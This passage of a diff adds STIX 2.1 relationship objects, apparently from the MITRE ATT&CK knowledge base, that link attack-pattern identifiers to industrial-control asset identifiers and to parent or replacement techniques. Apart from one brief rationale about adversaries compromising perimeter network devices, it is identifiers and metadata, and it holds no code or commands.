{ + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edace4e0-e9ea-47c4-bb0e-7d15ba6f5681", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edccbe1f-a07a-405e-9b9a-b247ce3dcc9b", + "created": "2023-09-29T17:58:54.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:58:54.996Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edd57071-907a-43aa-ac20-3e44392950a3", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ede2b798-2f39-419e-a7d3-8f0c733af4c1", + "created": "2023-09-28T21:12:00.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:12:00.004Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edf1fa16-0988-45f6-a822-61e88cabd67b", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edf5f8bd-4258-4d84-b5fc-d90984b68eee", + "created": "2024-05-22T17:18:51.755Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:36:29.404Z", + "description": "Asset Mapping Rationale: Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation.", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edf887db-fd07-445a-beb1-89b21bc8f7fa", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edfa4bcb-6304-42df-b7c6-8caf480c66f2", + "created": "2023-09-29T17:58:04.082Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:58:04.082Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edfc2cde-2310-4622-8693-e1325987c762", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee14c1f8-55f5-4fcf-adc3-dc34d6ade005", + "created": "2020-02-12T18:56:31.130Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee1f305b-d800-4a85-8c15-b032cb6de564", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee212490-822c-4851-bf2f-06b8179a9a38", + "created": "2020-02-11T18:41:44.872Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee3f6e22-7bc4-44be-af89-b0af390bb30a", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee49a3a7-d866-459c-85be-596a94635d0d", + "created": "2024-06-27T09:45:23.997Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:45:23.997Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee72cc27-2e78-47c4-8786-1351f9bcee97", + "created": "2023-09-28T20:05:33.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:05:33.450Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee74a23f-5981-4601-8321-a5db7af73f77", + "created": "2020-10-01T01:33:01.536Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee8648ba-704a-4dd8-8289-88f71d8ec995", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee8a92ed-ec3d-4f6c-b2f6-91afbd131f54", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ee968d13-14bb-4991-997a-19083ef7eda5", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eebae2f3-aaa1-4410-8b75-db5bdac1d4d6", + "created": "2023-09-28T20:04:07.868Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:04:07.868Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eec52445-21af-4683-8b1e-10ed2fb06504", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eec61ad2-8afa-40b7-bae1-d4cc74a6f7a2", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eee7b7be-9020-4403-ab92-505d45bc61bd", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eeeb83cb-0a8a-412b-aae2-aede7c43d8e8", + "created": "2023-09-28T21:11:45.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:11:45.241Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef02e21a-5ccd-4a69-a735-b9eba6f08b91", + "created": "2020-02-20T22:11:00.290Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2e114e45-2c50-404c-804a-3af9564d240e", + "target_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef087ae8-5b2c-4cc9-99f0-c3f9550fc94e", + "created": "2020-01-24T14:52:55.449Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41", + "target_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef122127-7a38-4c70-9fe4-0c2e1859bc41", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef13558b-53a2-49f2-bd5e-141edc1a10a1", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef1787e0-add4-4490-9777-33462acf9325", + "created": "2020-10-02T16:49:31.370Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", + "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef1b116f-5bff-46b0-99a6-f5550fc014f0", + "created": "2024-06-26T15:39:37.670Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:39:37.670Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef417e32-09d8-46fc-95ce-426c8ab828fd", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef5cf710-c459-40cd-9d2d-2136843cfb6c", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef60735b-c64b-465c-9e5f-46a4d3a49fb3", + "created": "2023-09-28T19:54:48.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:54:48.577Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef645859-e426-449f-bae0-2d5caaa7c4f9", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef735bd3-c922-4d7b-8811-0033330cc7ec", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef845b59-ea2f-46bf-a2e2-c4c3589b985c", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ef8bf064-c6c4-4504-ad65-62f6eb9347b9", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--efa880dc-29e6-463d-b4aa-5c4846032b99", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": 